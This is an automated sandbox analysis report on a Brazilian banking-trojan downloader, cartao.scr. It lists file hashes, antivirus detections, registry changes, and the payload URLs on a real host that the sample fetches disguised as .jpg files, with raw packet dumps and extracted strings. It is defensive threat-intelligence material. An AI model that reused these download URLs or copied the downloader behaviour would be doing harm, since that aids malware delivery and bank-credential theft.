Analysis Date: 2015-01-24 12:10:59
MD5: b1ed96183c5acfa6dc76305eabff686c
SHA1: 91a41ede93b9b180cb149c4a6039754037af61e4

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: adb0dcc54acc189673b357d844a2e2d0 sha1: daedbb366ea9fb08f4666d97bfe4645ecc180b29 size: 167936
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.petite md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: d503ebc2deda47e54e9c7fb3aeed4d7a sha1: 905e0aa16dcfe4417f90c3874d2f7946153d3675 size: 512
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: 332f9609f2c5d0d7dd2053c094ddeb87 sha1: 58bbb34422b29027abe8d8af49660489283b8802 size: 24150
Section md5: 723fac501966f4b57e27eb06b0365a9c sha1: e34a0f49389b29d2ba7d18609354ee6db581ffcc size: 1536
Timestamp: 1992-06-19 22:22:17 (this is the fixed link-time stamp that Borland Delphi linkers write into the PE header, consistent with the Borland version info below; it does not indicate the real build date)
Version
LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: cartao.scr
FileVersion: 7.0.7.409
CompanyName: Borland Software Corporation
PrivateBuild:
LegalTrademarks: Copyright © Borland Software Corporation 1990, 2001
Comments:
ProductName:
ProductVersion: 8.0
FileDescription: Flash mensage
OriginalFilename: cartao.scr
Packer: Petite v?.? (after v1.4)
PEhash: e47e19705eb12f682b9e7638468735815d677ae2
IMPhash: 1ebcff0797142335f74d1006c8c5aced
AV 360 Safe: no_virus
AV Ad-Aware: no_virus
AV Alwil (avast): VB-FX [Wrm]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Trojan-disguised-based!Maxi
AV Avira (antivir): TR/Dldr.Delphi.Gen
AV BullGuard: no_virus
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: BC.Heuristic.Trojan.SusPacked.BF-6.A
AV Dr. Web: Trojan.DownLoader1.1259
AV Emsisoft: no_virus
AV Eset (nod32): Win32/TrojanDownloader.Banload.LNU
AV Fortinet: PossibleThreat
AV Frisk (f-prot): W32/Trojan-disguised-based!Maxi
AV F-Secure: no_virus
AV Grisoft (avg): PSW.Banker
AV Ikarus: Trojan-Downloader.Win32.Small
AV K7: Trojan ( 7000000f1 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: no_virus
AV Mcafee: Generic.dx!B49407248BC3
AV Microsoft Security Essentials: TrojanDownloader:Win32/Banload.OY
AV MicroWorld (escan): no_virus
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Infostealer.Bancos!gen
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Mutex: STFK MutexXx
Winsock DNS: www.myrna2010.hpg.com.br
Winsock URL: http://www.myrna2010.hpg.com.br/mcitane1.jpg
Winsock URL: http://www.myrna2010.hpg.com.br/winset.jpg
(The .jpg extension is not evidence of image content: URLDownloadToFileA appears in the Strings section, which suggests these resources are written to disk, and the capture below records only the requests, not the responses.)

Network Details:

DNS: www.myrna2010.hpg.com.br
Type: A
187.31.64.20
HTTP GET: http://www.myrna2010.hpg.com.br/mcitane1.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.myrna2010.hpg.com.br/winset.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 187.31.64.20:80
Flows TCP: 192.168.1.1:1033 ➝ 187.31.64.20:80

Raw Pcap
0x00000000 (00000)   47455420 2f6d6369 74616e65 312e6a70   GET /mcitane1.jp
0x00000010 (00016)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 7777772e 6d79726e   ..Host: www.myrn
0x000000b0 (00176)   61323031 302e6870 672e636f 6d2e6272   a2010.hpg.com.br
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f77696e 7365742e 6a706720   GET /winset.jpg 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e6d79 726e6132   Host: www.myrna2
0x000000b0 (00176)   3031302e 6870672e 636f6d2e 62720d0a   010.hpg.com.br..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a0d0a            -Alive......


Strings
.(
.A
.
..
..
-.
.
b..$...
(
..
 
.!v
#...
081604E4
333f3
7.0.7.409
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
Borland Software Corporation
 Borland Software Corporation 1990, 2001
cartao.scr
Comments
CompanyName
Copyright 
DLGTEMPLATE
DVCLAL
f3fff
FileDescription
FileVersion
Flash mensage
InternalName
LegalCopyright
LegalTrademarks
MAINICON
OriginalFilename
PACKAGEINFO
PREVIEWGLYPH
PrivateBuild
ProductName
ProductVersion
StringFileInfo
TFORM1
Translation
VarFileInfo
VS_VERSION_INFO
```&&&&&&&&&
>*`'<,
)^01e$
@0A,d"
0J5pIA
),0k/z+
<0M)=4!
0Rq|Yz
1^4c9b4I;
15r=p:
1"~6DRH
;1BsVC%
1F0@'v
`1SK}b
]2<&\7
2lbG0^
3 ! 0>".;
33333337
33\hfw
:3q\LH"K
<3rdJr
3s,*!>^
3S3333;
3t#XXc"	s[
!/<,4#
44wwwwwww
*4-d]?A
4*n ?_
4N[4<!1
#`4P@?
4;R\qmijJ
]_4[Y"i
55DBT+D
&&%:56
5}J7}x'
5 Nc;hn
/5N}HU
5_S=SR
5"Y5i?$>k
`65&:J
(6/%8]
6\8'B;
6A3TD0|^
>6aM1?
"6CQD^3D
6DLe2"-	}z
)6'J8EAw\|s
6L)<9pl
6||{T7S
$7( / 2
7DU[/:7
7(]$I<08;
~7j]P|W+
8D"DWIx
8DHo|D7%
8=H)>N&
8M4*4*
8NG>9/
!8P1sZ
@<907553:
96AiF|8
&9$:*7
(?9AF"
@9D.D(
9F_V{V_
=9*$h2u
9hTT89@
9J2$e#N]HOz4MJF
9O_P|L
9}QMu&
A#0.D$2=H1gl
a^7qcy)
#a7rA1bqP
@\ABdB
advapi32.dll
_A{-eQ)~ 
>Ai5  
]Air`Vq
*aLSC~.D!
*amfb`v1#a
ANM._|v
aS[U3l
auCnqE
Awf$&Ib
`	axZ+
:aY<0=
ayCjNuN
baMY<"
B$AZn,
]b=DKx
BDPU]bsX
bj{n#hVB
B*_kA9
BlGnDp]r
bmyn)Df
bqruje$q
BRWW+Qx
	BtM0K
BxYOeJ
~C6S{%
Cax]E/]	 
C)d6P L
@.cgceb%
@>CG(Q]s
CK}&rv#CS
+c,L3T
Coj0:m!B
comctl32.dll
Compressed by Petite (c)1999 Ian Luck.
Corrupt Data!
cQv,;i
\C;"T	
cZt(WA_
d7MHr4
^dbQT{@
&D:c2D\
]DEGq|
 d}Fz|`
" "DhX
DlSm$&
 'D@o]
~Du.Qu
d(U"s9
dV_[x9<I
E2B$_F
e35 P~QC80@QDd
EES<O~
(eF@r>
e?fTJ^
eLFI0c<
EOLQ(>!,
e)Q"e.
]EqEvq3
ERROR!
ET(;pJ
E,Wp_.
ExitProcess
f/0bfa
F734]n\T`
FdCf@hAj
F@E&GH
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
F"~HDfV
F=LP>T
(.fO6ZF^
:fqJwa*6
f;W(Hs
?&G)2Q
G30xp4;
g6AqtC
"<g"9`
gB}GXI
GCJEK%
gdi32.dll
GetProcAddress
GkE!*l
)G&*l4(
},+gm4?
gMj35O
:Go7K`
GR\-5l5
'/#gRA}
G}scB _
/g*u6}R
g}WBPU
h'<bEP
hC~HH,J
H#E}( 
h.__fw(
h*g'<[
HKr!Q.QmG
$H!">L7ZU
hMj@4n
@'h*mU
\hn~ce
HNPUmP
HOdM"~
H^PO_JLU
 /*?Hq~"N@bu
HQP^0>QP'~
Hq=pd{
h<t";r
-}hZdC|
i)7"Q-
ImageList_Add
\IpaZQF
ipo$toZ
IuP!E,
/I:USD
Ivpt[]
I)!/YD
i\ZUCKWG
j902M4
:Ja>y:
/j; 'C(
`````````JCD&&&&&&
``````JCD&&&&&&&&&
```&&&JCD&&&&&&&&&
```JCD```
```JCDJCDJCDJCD&&&&&&
[JFC^Zz
j|mnpA
jM=q'N 
jq,'"VS
jqwq]%
^J]wZ~
^jxcekY
k!8:[o
k.E)43
^K-~~elCu\
kernel32.dll
kI"k4G
kMvu0xz|B
(ky3Qs
L+1D	j
LH7xxx
?|\LHw
LIER_}[
L\-$Is
-lj @X
L.JX0LK
LoadLibraryA
LocalAlloc
lqJILF;
Lq=}nuY
lsjbYlw
Ls_UAa
":lX!I@0="
LYE#6hn8cw
m+0ybZ
m6~hJw
MessageBoxA
MFlwA^Q
Mf>\-n
mKE[B"qV
%mnn:<l
Mo"\BC
!M{V4k
\Mwn4In
n"50eH
NbU;])l
^##,\Nd
/@NEG>E
@\NEXL
NHIRLMUMN&''
NM7E47
nMBR4,
NoV{Ro0
npC}'&
NTKVHXyZ
*[ntwJle
nUEU,%
`NuH]zw
{[[]NVM
O2C.dm
O2X`Sa
o9b@6@"@
oleaut32.dll
oMc_43
@@@O@ncm
On$QRTHFH
[OnUs{
oW8L3S
O*Xxf^d
:/"P'0"
P]B:[]7
@_[P\EBL
.petite
pGC>\Km
PH~-po
P?.k*a)
$`PMAw
PM\l4x
~pOo}km
pzO_MV
`qbDszp
;QeR*-c
*[!Q"g
QiMVPVLX
(Qi=Q4f
QNDJXZMS
"QUb	g
)q'uYu^
]QW@XGMR
q\x7nA
QYZT88
`Q%Z$c
ratqFxq
~"&rBN
#R%D5?
RegCloseKey
}rF.0o
RGuDr,
r;h;8N
]r&hlG
Ri2%QO
rJ-`b9j4r
RLWNTPMR
r_NWm[U MR
rQ}Tyg
_[RVQEUK
r$ZGO'
rzlZ'&":
.rz-#P
s[`1e8&,
s333333333
SaveDC
,Sc2K2
SCpGET
Sece7O
s]<]}G
s)&-HA
$}S?M;
sm1f:x
SrMjb4j
$SsEqK
su/&, 
svw_QY
s@y$_3
SysFreeString
t4-^0P}>
[Td?*X
tFhoqVO
TF@toD
t^`H8d
This program must be run under Win32
tKQ Ig+
TLm>*%
TM?b R
TMD:4.
TMD&46
[}TM@H
 T}]mu
T?;n)]
TQREhb
T_qSXvlgM
	TR4}PR)
tuu]_^SLN
^t[vXxIz
TwWc7	
TYO/}/=
U$$#@)
/>,@UB
U@D(GF*f
_`!"=>	Ugh
|UGK.WO
UKMdQ_
umTCiZ
UMTs	1nSI
U[%Pl$
Ur0|A]j
URLDownloadToFileA
URLMON.DLL
user32.dll
u(T53B
utx!7j<
uuA}8mX9
UW7WQh[
u`w(Jq
[UW_LPV
uW}t?4{
|uX.!+
uX	UDQ
uzHVL`W3
`+%$'%v
VA3*aS
VariantCopy
VerQueryValueA
version.dll
VirtualProtect
v(*"kT
;vKtOK
V{$Tg2
VV"W_[
v _W_]
v:W@mX
=. ,W+
]W0),I-$
@ W7u*lDw
/	wC7	
w\d+Kk
WGPotl
WJG@_[
$w}[lDI
wMKO4S
$	WMqo
wnLBF 
{woFfhZ
woo ,l
WPW| 4
WQ3L[k
wsprintfA
w-u*z4?
WWW`8|
wwwQMM
wwwwww
wwwwwwwwws
wwwwwwwwwwwp
wwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwww
	X56D%
`X5g|[<
x"$ac=
@xA(dJ
@xAvdj
x|B/ X,d2
x*C-an
X."ENN
x&G#Ho
^Xh:u\
XN\^I_
Xph_U[V
X@*tS-
X"uY0,
&[Xx"JCH
xxxxxx
xxxxxxxx
y1tHp@,(
|y8DI;%
(<yb5*}
}yc~hz
,Ydd5,y>
yMM-!x
Z:7_VP
Z`A5]4d
zD5_kO
zDIa)B
ze!&zr]
z} @ft
ZML64$
+ZTWW4OE
Z;<uCW